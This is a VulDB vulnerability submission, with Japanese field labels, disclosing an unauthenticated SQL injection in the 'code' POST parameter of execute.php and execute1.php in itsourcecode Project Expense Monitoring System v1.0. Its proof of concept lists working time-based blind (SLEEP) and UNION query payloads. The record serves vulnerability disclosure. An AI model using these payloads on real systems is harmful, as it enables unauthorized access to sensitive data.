| タイトル | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| 説明 | Attackers do not need to log in to the backend. They can pass in the code parameter in the execute.php and execute1.php pages and construct special SQL statements to carry out SQLi injection attacks to obtain sensitive data.
POC:
Parameter: code (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: code=1' AND (SELECT 3055 FROM (SELECT(SLEEP(5)))qdgV) AND 'wCrt'='wCrt
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: code=1' UNION ALL SELECT NULL,CONCAT(0x717a717071,0x6a5158484166616e41746e696241666561674a53525661626877575a6f426454534d69745359456c,0x71786a7171),NULL,NULL,NULL,NULL,NULL,NULL-- - |
|---|
| ソース | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-2.md |
|---|
| ユーザー | GUOTINGTING (UID 73614) |
|---|
| 送信 | 2024年08月17日 14:14 (2 年 ago) |
|---|
| モデレーション | 2024年08月19日 16:12 (2 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 275119 [itsourcecode Project Expense Monitoring System 1.0 execute.php SQLインジェクション] |
|---|
| ポイント | 20 |
|---|